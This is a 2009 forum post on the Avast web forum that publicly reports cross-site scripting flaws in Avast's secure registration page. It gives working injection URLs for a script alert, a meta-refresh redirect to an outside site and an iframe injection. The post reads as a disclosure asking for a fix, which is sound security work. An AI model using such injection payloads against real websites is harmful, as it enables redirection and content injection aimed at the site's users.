Avast WEBforum

Other => General Topics => Topic started by: Methodman on March 16, 2009, 01:03:38 PM

Title: Secure Avast website still Not Secure
Post by: Methodman on March 16, 2009, 01:03:38 PM: another critical xss bug was found ,so maybe someone want to check and fix it ;)

Code: [Select]
https://secure.avast.com/scripts/register.php?lang=?"><script>alert(/XSS/)</script>

redirect:

https://secure.avast.com/scripts/register.php?lang=?">"">>>><meta http-equiv="Refresh" content="0;url=http://nemesis.te-home.net/"> "" (https://secure.avast.com/scripts/register.php?lang=?">"">>>><meta http-equiv="Refresh" content="0;url=http://nemesis.te-home.net/"> "")

iframe injection:

Code: [Select]
https://secure.avast.com/scripts/register.php?lang=?https://secure.avast.com/scripts/register.php?lang=?'"><iframe src=http://img164.imageshack.us/img164/899/63094193mx7.jpg></iframe>

SMF 2.0.18 | SMF © 2015, Simple Machines